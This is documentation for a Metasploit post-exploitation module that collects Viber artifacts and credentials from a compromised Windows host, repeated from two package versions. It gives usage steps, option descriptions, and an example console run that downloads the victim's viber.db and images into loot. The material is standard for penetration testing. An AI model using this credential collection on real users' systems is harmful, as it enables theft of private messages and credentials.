==> metasploit-6.1.8-2-x86_64.pkg.tar.zst: usr/share/doc/metasploit/modules/post/windows/gather/credentials/viber.md <==
## Module Description

This post-exploitation module gathers artifacts found on Viber related folders from end users systems.

The list of available artifcts are listed within the module and can be added at anytime. Each artifacts are categorised so that users can specify a category to look for.


## Verification Steps

1. Start MSF console
2. Get a Meterpreter session on a Windows system
3. use post/windows/gather/credentials/viber
4. Set SESSION 1
5. enter 'run' to extract credentials from all applications


## Options
### REGEX

Users can set their own regular expressions so that it could be applied for the credential extraction. The default is set to ^password.

### VERBOSE

By default verbose is turned off. When turned on, the module will show information on files which aren't extracted and information that is not directly related to the artifact output.


### STORE_LOOT
This option is turned on by default and saves the stolen artifcats/files on the local machine,
this is required for also extracting credentials from files using regexp, JSON, XML, and SQLite queries.


### EXTRACT_DATA
This option is turned on by defalt and will perform the data extraction using the predefined regular expression. The 'Store loot' options must be turned on in order for this to take work.

## Example Run
### Default Output
  ```
msf6 post(windows/gather/credentials/viber) > run 

[*] Filtering based on these selections:  
[*] ARTIFACTS: All
[*] STORE_LOOT: true
[*] EXTRACT_CREDENTIALS_FROM_FILE: true

[*] Viber's parent folder found
[*] Viber's Viber.db file found
[*] Downloading C:\Users\IEUser\AppData\Roaming\ViberPC\447984845741\viber.db
[*] Viber Viber.db downloaded
[+] File saved to:  /root/.msf4/loot/20210513071138_default_192.168.56.106_viberviber.db_428035.db

[*] Viber's parent folder found
[*] Viber's parent folder found
[*] Viber's *.jpg file found
[*] Downloading C:\Users\IEUser\AppData\Roaming\ViberPC\447984845741\Backgrounds\15\Thumbnails\10000486.jpg
[*] Viber 10000486.jpg downloaded
[+] File saved to:  /root/.msf4/loot/20210513071139_default_192.168.56.106_viber10000486.jp_920388.jpg

[*] Downloading C:\Users\IEUser\AppData\Roaming\ViberPC\447984845741\Backgrounds\15\Thumbnails\10000487.jpg
[*] Viber 10000487.jpg downloaded
[+] File saved to:  /root/.msf4/loot/20210513071139_default_192.168.56.106_viber10000487.jp_576575.jpg


[*] PackRat credential sweep Completed
[*] Post module execution completed

  ```

==> metasploit-6.4.104-1-x86_64.pkg.tar.zst: usr/share/doc/metasploit/modules/post/windows/gather/credentials/viber.md <==
## Module Description

This post-exploitation module gathers artifacts found on Viber related folders from end users systems.

The list of available artifcts are listed within the module and can be added at anytime. Each artifacts are categorised so that users can specify a category to look for.


## Verification Steps

1. Start MSF console
2. Get a Meterpreter session on a Windows system
3. use post/windows/gather/credentials/viber
4. Set SESSION 1
5. enter 'run' to extract credentials from all applications


## Options
### REGEX

Users can set their own regular expressions so that it could be applied for the credential extraction. The default is set to ^password.

### VERBOSE

By default verbose is turned off. When turned on, the module will show information on files which aren't extracted and information that is not directly related to the artifact output.


### STORE_LOOT
This option is turned on by default and saves the stolen artifacts/files on the local machine,
this is required for also extracting credentials from files using regexp, JSON, XML, and SQLite queries.


### EXTRACT_DATA
This option is turned on by default and will perform the data extraction using the predefined regular expression. The 'Store loot' options must be turned on in order for this to take work.

## Example Run
### Default Output
  ```
msf post(windows/gather/credentials/viber) > run 

[*] Filtering based on these selections:  
[*] ARTIFACTS: All
[*] STORE_LOOT: true
[*] EXTRACT_CREDENTIALS_FROM_FILE: true

[*] Viber's parent folder found
[*] Viber's Viber.db file found
[*] Downloading C:\Users\IEUser\AppData\Roaming\ViberPC\447984845741\viber.db
[*] Viber Viber.db downloaded
[+] File saved to:  /root/.msf4/loot/20210513071138_default_192.168.56.106_viberviber.db_428035.db

[*] Viber's parent folder found
[*] Viber's parent folder found
[*] Viber's *.jpg file found
[*] Downloading C:\Users\IEUser\AppData\Roaming\ViberPC\447984845741\Backgrounds\15\Thumbnails\10000486.jpg
[*] Viber 10000486.jpg downloaded
[+] File saved to:  /root/.msf4/loot/20210513071139_default_192.168.56.106_viber10000486.jp_920388.jpg

[*] Downloading C:\Users\IEUser\AppData\Roaming\ViberPC\447984845741\Backgrounds\15\Thumbnails\10000487.jpg
[*] Viber 10000487.jpg downloaded
[+] File saved to:  /root/.msf4/loot/20210513071139_default_192.168.56.106_viber10000487.jp_576575.jpg


[*] PackRat credential sweep Completed
[*] Post module execution completed

  ```
